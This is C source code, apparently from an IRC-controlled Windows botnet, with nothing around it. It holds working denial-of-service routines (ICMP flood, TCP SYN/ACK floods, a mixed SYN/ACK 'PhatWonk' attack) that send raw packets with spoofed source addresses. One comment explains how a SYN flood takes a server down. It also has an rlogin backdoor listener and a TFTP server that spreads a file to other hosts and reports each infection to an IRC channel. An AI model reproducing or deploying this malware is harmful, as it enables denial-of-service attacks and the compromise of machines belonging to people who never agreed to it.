DWORD WINAPI ICMPFloodThread(LPVOID param) { ICMPFLOOD icmpflood = *((ICMPFLOOD *)param); ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param; icmpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; static ECHOREQUEST echo_req; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } if (finet_addr(icmpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[ICMP]: Invalid target IP."); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) { echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); echo_req.ipHeader.ident=1; echo_req.ipHeader.frag_and_flags=0; echo_req.ipHeader.ttl=128; echo_req.ipHeader.proto=IPPROTO_ICMP; echo_req.ipHeader.checksum=0; echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock)))); echo_req.ipHeader.destIP=ssin.sin_addr.s_addr; echo_req.icmpHeader.type = rand()%256; echo_req.icmpHeader.subcode = rand()%256; echo_req.icmpHeader.id = (rand() % 240) + 1; echo_req.icmpHeader.checksum = 0; echo_req.icmpHeader.seq = 1; //fill the packet data with a random character.. memset(echo_req.cData, rand()%255, sizeof(echo_req.cData)); if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); }
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
DWORD WINAPI tftpserver(LPVOID param) { FILE *fp; int reuse_addr = 1, excl_addr_use = 1; char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18]; int err=1; TFTP tftp = *((TFTP *)param); TFTP *tftps = (TFTP *)param; tftps->gotinfo = TRUE; tftp.threads++; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) { Sleep(400); // sprintf(sendbuf,"-\x03\x34\2tftpd\2\x03- Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } fsetsockopt(ssock, SOL_SOCKET, SO_REUSEADDR, (char*)&reuse_addr,sizeof(reuse_addr)); fsetsockopt(ssock, SOL_SOCKET, SO_EXCLUSIVEADDRUSE, (char*)&excl_addr_use,sizeof(excl_addr_use)); threads[tftp.threadnum].sock=ssock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)tftp.port); ssin.sin_addr.s_addr = INADDR_ANY; if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { Sleep(5000); tftp.threads--; return tftpserver(param); } if ((fp=fopen(tftp.filename, "rb")) == NULL) { Sleep(400); // sprintf(sendbuf,"-\x03\x34\2tftpd\2\x03- Failed to open file: %s.",tftp.filename); irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } while(err>0 && tftps->gotinfo && fp) { TIMEVAL timeout; timeout.tv_sec=5; timeout.tv_usec=5000; fd_set fd; FD_ZERO(&fd); FD_SET(ssock,&fd); memset(buffer,0,sizeof(buffer)); if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { SOCKADDR_IN csin; int csin_len=sizeof(csin); char f_buffer[BLOCKSIZE+4]=""; err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); sprintf(IP,finet_ntoa(csin.sin_addr)); // parse buffer if(buffer[0]==0 && buffer[1]==1) { //RRQ char *tmprequest=buffer,*tmptype=buffer; tmprequest+=2; //skip the opcode tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL // if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { // fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len); // // for loop to add a \0 to the end of the requestname // sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname); // addlog(buffer); // } else { // good rrq packet send first data packet fseek(fp, 0, SEEK_SET); f_buffer[0]=0; f_buffer[1]=3; // DATA f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK # err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); //sprintf(sendbuf,"Tftp transfer started to: %s",IP); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); // } } else if(buffer[0]==0 && buffer[1]==4) { // ACK // send next packet unsigned int blocks; BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK # f_buffer[0]=0; f_buffer[1]=3; // DATA if (b2==255) { // DATA BLOCK # f_buffer[2]=++b1; f_buffer[3]=b2=0; } else { f_buffer[2]=b1; f_buffer[3]=++b2; } blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block # fseek(fp, blocks * BLOCKSIZE, SEEK_SET); err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); if (err==0) { sprintf(sendbuf,"0,4| ^^VrX^^ |0,1| P0w3rFully |1,8 | 0Wn3D > %s",IP); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); transfers_tftp++; } } else { // we dont support any other commands fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); } } else continue; } // check for ack, then msg irc on transfer complete fclosesocket(ssock); fclose(fp); tftp.threads--; if(tftps->gotinfo == FALSE) { clearthread(tftp.threadnum); ExitThread(0); } Sleep(1000); return tftpserver(param); }
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay) { BOOL flag=TRUE; unsigned long lTimerCount=0; struct timespec ts; int i=0; struct sockaddr_in addr; int scansock=0; sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED); fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag)); srand(GetTickCount()); unsigned int port[28] = { 1025,21,22,23,25,53,80,81,88,110,113,119,135, 137,139,143,443,445,1024,1433,1500, 1720,3306,3389,5000,6667,8000,8080 }; unsigned int openport[28] = {0,0,0}; static char hitports[1024] = ""; int hitport=0, lastport=0; char tmpMess[]=""; struct timeval working_timeout; working_timeout.tv_sec = 3; working_timeout.tv_usec = 3000; for (i=0;i<28;i++) { addr.sin_family = AF_INET; addr.sin_addr.s_addr = TargetIP; addr.sin_port = fhtons(port[i]); scansock = fsocket(AF_INET,SOCK_STREAM,0); int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout); fclosesocket(scansock); if(result == 0) { openport[i] = port[i]; } } sprintf(hitports, " "); lTimerCount=GetTickCount(); for (i=0;i<28;i++) { if ((GetTickCount()-lTimerCount)/1000>len) break; if (openport[i] != 0) { hitport = openport[i]; //hitports.Format("%s%d ",hitports.CStr(),hitport); sprintf(hitports, "%s%d ", hitports, hitport); } else { hitport = fhtons (brandom (0, 65535)); // no open ports } } for (;;) { memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ihl = 5; packet.ip.ver = 4; packet.ip.pro = IPPROTO_TCP; packet.ip.tos = 0x08; packet.ip.id = fhtons (brandom (1024, 65535)); packet.ip.tl = fhtons(sizeof(packet)); packet.ip.off = 0; packet.ip.ttl = 255; if (!spoofing) packet.ip.src = spoofip(TargetIP); else packet.ip.src = finet_addr(spoof); packet.ip.dst = TargetIP; packet.tcp.flg = 0; packet.tcp.win = fhtons(16384); packet.tcp.seq = fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8)); packet.tcp.ack = 0; packet.tcp.off = 5; packet.tcp.urp = 0; packet.tcp.dst = hitport; cksum.pseudo.daddr = TargetIP; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = fhtons(sizeof(struct xtcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = TargetIP; s_in.sin_port = packet.tcp.dst; for(i=0;i<1023;++i) { /* send 1 syn packet + 1023 ACK packets. */ if(i==0) { packet.tcp.src = fhtons (brandom (0, 65535)); cksum.pseudo.saddr = packet.ip.src; packet.tcp.flg = SYN; packet.tcp.ack = 0; } else { packet.tcp.flg = ACK; packet.tcp.ack = fhtons (brandom (0, 65535)); } ++packet.ip.id; ++packet.tcp.seq; s_in.sin_port = packet.tcp.dst; packet.ip.sum = 0; packet.tcp.sum = 0; cksum.tcp = packet.tcp; packet.ip.sum = checksum((unsigned short *)&packet.ip, 20); packet.tcp.sum = checksum((unsigned short *)&cksum, sizeof(cksum)); fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)); } if((GetTickCount()-lTimerCount)/1000>len) break; Sleep(delay); } return hitports; }